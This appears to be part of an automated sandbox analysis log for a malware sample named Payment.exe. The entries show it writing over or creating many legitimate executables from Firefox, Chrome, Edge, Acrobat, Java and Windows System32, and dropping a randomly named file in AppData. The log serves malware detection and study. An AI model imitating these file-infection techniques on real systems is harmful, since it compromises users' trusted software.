                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Windows\System32\wbem\WmiApSrv.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Windows\System32\vds.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\7-Zip\7zFM.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Windows\System32\snmptrap.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Windows\System32\Spectrum.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Windows\System32\Locator.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files (x86)\Google\GoogleUpdater\135.0.7023.0\updater.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\7-Zip\7z.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Windows\System32\AppVClient.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Windows\SysWOW64\perfhost.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\7-Zip\7zG.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Windows\System32\msiexec.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Windows\System32\VSSVC.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Windows\System32\wbengine.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Windows\System32\SearchIndexer.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Windows\System32\TieringEngineService.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Windows\System32\AgentService.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Windows\System32\FXSSVC.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Windows\System32\SgrmBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSystem file written: C:\Windows\System32\sppsvc.exe
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Windows\System32\SensorDataService.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Windows\System32\msdtc.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeSystem file written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files\Mozilla Firefox\pingsender.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Windows\System32\vds.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Windows\System32\snmptrap.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Windows\System32\Spectrum.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Windows\System32\Locator.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\Google\GoogleUpdater\135.0.7023.0\updater.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files\7-Zip\7z.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Windows\SysWOW64\perfhost.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files\7-Zip\7zG.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Windows\System32\msiexec.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Windows\System32\TieringEngineService.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files\Mozilla Firefox\firefox.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files\Mozilla Firefox\updater.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Users\user\AppData\Roaming\jwBqGZseW.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeFile created: C:\Windows\System32\sppsvc.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Windows\System32\SensorDataService.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Windows\System32\msdtc.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Windows\System32\wbem\WmiApSrv.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
